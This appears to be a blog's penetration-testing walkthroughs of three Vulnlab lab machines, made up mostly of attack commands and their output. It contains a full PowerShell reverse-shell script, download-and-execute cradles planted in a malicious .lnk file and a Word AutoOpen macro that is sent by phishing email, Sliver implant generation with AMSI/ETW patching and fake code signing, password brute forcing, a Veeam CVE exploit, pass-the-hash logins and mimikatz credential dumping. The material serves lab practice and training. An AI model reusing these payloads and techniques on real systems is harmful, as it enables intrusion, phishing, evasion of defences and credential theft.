[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.

 

 

vulnlab-sidecar

vulnab-sidecar

a very hard Windows machine

Preparing the Shellcode

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

 

Create a malicious link on a Windows pc

i used

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))

 

Uploading the malicious link file

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>

Serving the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -

 

Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

so we have

c:\Users\e.klaymore\Desktop>net user

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.

.

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start Sliver C2

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Let’s donut this file

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then Scarecrow the file

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

got a session, but after uploading SharpHound.exe , my sliver session gets disconnected

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So we need the beacon.exe in a new lnk file

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe

 

To be continued …

 

vulnlab-job2

job2 a hard windows machine , from phising to admin

Preperation

1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don’t use .docx as the file extension since it won’t allow for embedded macros. Either use .doc or .docm

Do the testing on your lan 1st ( a kali box and a windows11 pc )

i used this macro

Sub AutoOpen()

  a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open the puck3.docm 2 times, 1st to download rcat, and 2nd time to execute rcat.exe

If you receive a reverse shell , start the job2 box , to get the job2

Here we go …

We start with a nmap scan

Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (10.10.122.114)
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine  a website, and find out how to apply for the job2

Send your CV 2 times ( of course 1st modify your test ip on lan to your tun0 ip of the vulnhub vpn. in the macro of puck3.docm

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -

 

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>whoami
job2\julian

C:\Windows\system32>net users

User accounts for \\JOB2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
WDAGUtilityAccount       
The command completed successfully.


C:\Windows\system32>

Next I did a brute-force

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB         10.10.122.114   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP        10.10.122.114   5985   JOB2             [*] http://10.10.122.114:5985/wsman
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

and it found Ferdinand’s pass

next evil-winrm to the box, and find VEEAM Backup installed

and used CVE-2023-27532-RCE-Only , to finish JOB2

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 

.

*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
                                        
Data: 573544 bytes of 573544 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
                                        
Data: 5925652 bytes of 5925652 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401

and catch the admin shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir
dir


    Directory: C:\users\Administrator\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             


PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>

 

That’s all.

Beyond root

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a

 

C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

powershell \windows\phishsim.ps1

phissim.ps1

Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
{
    $name = $event.SourceEventArgs.FullPath    
    $changetype = $event.SourceEventArgs.ChangeType    
    Write-Host "$name was $changetype at $(get-date)"
    if(!$name.Contains("~")){
        if(Test-Path $name){    
            Write-Host "Opening $name"
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            Get-Process "WINWORD.EXE" | Stop-Process -Force             
            Get-Process "WINWORD" | Stop-Process -Force  
            sleep 5
            Remove-Item $name -Force
         }
    }    
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

for(;;){
    sleep 45
}